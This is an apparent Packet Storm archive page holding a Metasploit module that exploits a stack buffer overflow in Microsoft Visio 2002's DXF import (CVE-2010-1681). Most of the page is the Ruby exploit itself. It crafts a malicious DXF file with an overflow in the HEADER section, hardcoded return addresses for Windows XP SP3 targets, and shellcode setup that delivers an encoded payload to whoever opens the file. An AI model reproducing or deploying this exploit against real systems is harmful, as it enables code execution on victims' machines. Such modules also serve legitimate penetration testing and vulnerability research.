what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Microsoft Office Visio VISIODWG.DLL DXF File Handling Vulnerability

Microsoft Office Visio VISIODWG.DLL DXF File Handling Vulnerability
Posted Jun 27, 2011
Authored by Core Security Technologies, Shahin, juan vazquez | Site metasploit.com

This Metasploit module exploits a stack based overflow vulnerability in the handling of the DXF files by Microsoft Visio 2002. Revisions prior to the release of the MS bulletin MS10-028 are vulnerable. The overflow occurs when the application is used to import a specially crafted DXF file, while parsing the HEADER section of the DXF file. To trigger the vulnerability an attacker must convince someone to insert a specially crafted DXF file to a new document, go to Insert -> CAD Drawing.

tags | exploit, overflow
advisories | CVE-2010-1681, OSVDB-64446
SHA-256 | f61db5b3c647e82f60841a3bcc9f264bbf908d6398708df6e22042a47f1bc8a0

Microsoft Office Visio VISIODWG.DLL DXF File Handling Vulnerability

Change Mirror Download
##
# $Id: visio_dxf_bof.rb 13034 2011-06-26 16:09:53Z sinn3r $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking

include Msf::Exploit::FILEFORMAT

def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft Office Visio VISIODWG.DLL DXF File Handling Vulnerability',
'Description' => %q{
This module exploits a stack based overflow vulnerability in the handling
of the DXF files by Microsoft Visio 2002. Revisions prior to the release of
the MS bulletin MS10-028 are vulnerable. The overflow occurs when the application
is used to import a specially crafted DXF file, while parsing the HEADER section
of the DXF file.

To trigger the vulnerability an attacker must convince someone to insert a
specially crafted DXF file to a new document, go to 'Insert' -> 'CAD Drawing'
},
'License' => MSF_LICENSE,
'Author' =>
[
'CORE Security', # original discovery
'Shahin Ramezany <shahin[at]abysssec.com>', # MOAUB #8 exploit and binary analysis
'juan vazquez', # metasploit module
],
'Version' => '$Revision: 13034 $',
'References' =>
[
[ 'CVE','2010-1681' ],
[ 'OSVDB', '64446' ],
[ 'BID', '39836' ],
[ 'URL', 'http://www.coresecurity.com/content/ms-visio-dxf-buffer-overflow' ],
[ 'URL', 'http://www.exploit-db.com/moaub-8-microsoft-office-visio-dxf-file-stack-overflow/' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'DisablePayloadHandler' => 'true',
},
'Payload' =>
{
'Space' => 2000,
'BadChars' => Rex::Text.charset_exclude(Rex::Text::AlphaNumeric),
'DisableNops' => true, # no need
'EncoderOptions' =>
{
'BufferRegister' => 'ECX'
}
},
'Platform' => 'win',
'Targets' =>
[
# Microsoft Office Visio 2002
# VISIO.EXE v10.0.525.4
# VISIODWG.DLL v10.0.525.4
# ECXAdjust:
# 0x8 => ESP points to the prepended shellcode
# 0x1A => Padding
# 0x2 => len(push esp, pop ecx)
# 0x3 => len(sub)
# 0x6 => len(add)
[
'Visio 2002 English on Windows XP SP3 Spanish',
{
'Ret' => 0x6173345c, # push esp, ret from VISIODWG.DLL
'Offset' => 0x50, # EIP
'ReadAddress' => 0x617a4748, # points to VISIODWG.DLL data segment
'ECXAdjust' => 0x2D
}
],
[
'Visio 2002 English on Windows XP SP3 English',
{
'Ret' => 0x60455F6B, # push esp, ret from VISLIB.DLL
'Offset' => 0x50, # EIP
'ReadAddress' => 0x66852040, # points to VISIODWG.DLL data segment
'ECXAdjust' => 0x2D,
}
],
],
'DisclosureDate' => 'May 04 2010'))

register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'msf.dxf']),
], self.class)
end

def exploit
content = "0\n"
content << "SECTION\n"
content << "2\n"
content << "HEADER\n"
content << "9\n"
content << "$ACADMAINTVER"
content << rand_text_alpha(target['Offset'] - "ACADMAINTVER".length)
content << [target.ret].pack('V') # new ret
content << "\xeb\x20\x90\x90" # short jmp to payload (plus two padding nops)
content << [target['ReadAddress']].pack('V') # readable address to avoid exceptions
content << rand_text_alpha(0x1A) # jumped by the short jump
# Get in ECX a pointer to the shellcode start
content << "\x54" # push esp
content << "\x59" # pop ecx
# ecx adjustment
content << Rex::Arch::X86.sub(-(target['ECXAdjust']),Rex::Arch::X86::ECX, "\x00\x0d\x0a", false, true)
# Stack adjustment
content << "\x81\xc4\x48\xf4\xff\xff" # add esp, -3000
content << payload.encoded
content << "\n"
content << "0\n"
content << "ENDSEC\n"
content << "0\n"
content << "EOF\n"

print_status("Creating #{datastore['FILENAME']} ...")
file_create(content)
end

end
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    28 Files
  • 16
    Jul 16th
    6 Files
  • 17
    Jul 17th
    34 Files
  • 18
    Jul 18th
    6 Files
  • 19
    Jul 19th
    34 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    19 Files
  • 23
    Jul 23rd
    17 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close